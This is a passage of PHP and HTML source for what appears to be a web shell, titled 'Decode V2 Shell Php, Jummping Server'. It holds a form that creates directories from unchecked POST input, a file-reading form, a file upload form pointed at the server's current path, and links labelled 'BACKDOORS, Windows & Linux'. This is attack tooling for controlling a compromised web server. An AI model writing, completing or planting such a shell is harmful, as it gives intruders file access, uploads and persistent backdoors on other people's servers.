  616. <INPUT TYPE="text" class="text" NAME="dirs" size="30" >
  617. <INPUT TYPE="submit" class="button" VALUE="Enviar">
  618. </FORM>
  619. </fieldset>
  620. </legend>
  621. <?php
  622. $directorio= $_POST['dirs'];
  623. mkdir($directorio);
  624. ?>
  625. <fieldset class="fieldset">
  626. <H1><font face="Courier" size="6">READ FILE</font>
  627. <form method="GET" NAME="file" action"?">
  628. <INPUT type="text" name="file" class="input" size="30">
  629. <input type="submit" class="button" name="enviar">
  630. </form>
  631. </fieldset>
  632. <fieldset class="fieldset">
  633. <?php
  634. print "</table><hr><table border=0 width=100%><td><b><h2><font color=\"withe\">Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?ok&upload=".realpath('.')."\" method=\"POST\">
  635. <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
  636. <input type=\"submit\" class=\"button\"value=\"Upload File\" />";
  637. ?>
  638. </fieldset>
  639. <fieldset>
  640. <legend> BACKDOORS , Windows & Linux</legend>
  641. <br>
  642. <a href="?backdoor1">Windows</a>
  643. <br>
  644. <a href="?backdoor">Linux</a>
  645. <br>
  646. <a href="?backs">GENERAL</a>
  647. </fieldset>

Decode V2 Shell Php , Jummping Server